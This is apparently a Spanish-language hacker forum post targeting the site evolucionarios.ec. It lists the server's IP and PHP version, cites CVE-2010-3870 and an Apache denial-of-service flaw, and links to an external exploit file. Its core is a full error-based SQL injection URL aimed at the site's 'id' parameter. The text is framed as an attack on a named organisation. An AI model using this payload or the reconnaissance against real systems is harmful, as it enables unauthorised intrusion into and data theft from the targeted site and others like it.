(SQL/ExploitX)evolucionarios.ec YeiZeta Post

1. WEB SERVER:evolucionarios.ec IP:108.166.85.168
2. PAGINA VERCION:Version 5.3.3
3.  
4. Vulnerabilidades conocidos de esta version Existen pocas pero tal vez sean de gran utilidad:
5. ç
6.  
7. Apache mod_cache y Solicitud mod_dav Negación Manejo de vulnerabilidad de los servicios
8.  
9. Un Poco del concepto:
10.  
11. La función utf8_decode en PHP 5.3.4 antes no controla correctamente no más corta de UTF-8 formato de codificación y subsecuencias mal formados en datos UTF-8, lo que hace que sea más fácil para los atacantes remotos evitar cross-site scripting (XSS) y SQL mecanismos de inyección de protección a través de una cuerda hecha a mano.
12.  
13.  
14. Certificado:
15.  
16. CVE-2010-3870
17.  
18.  
19. bueno amigos de Evolucionarios pueden conocer un poco mas de este falla aca:
20.  
21. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3870
22.  
23. tambien tenemos fallas (SQL) o mas bien posibildiades
24.  
25. https://evolucionarios.ec/evolucionarios/index.php?r=site/indiceSpec&id=-1' or 1=1+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&crit=1
26.  
27.  
28. EXPLOIT:
29.  
30. http://downloads.securityfocus.com/vulnerabilities/exploits/49303-2.c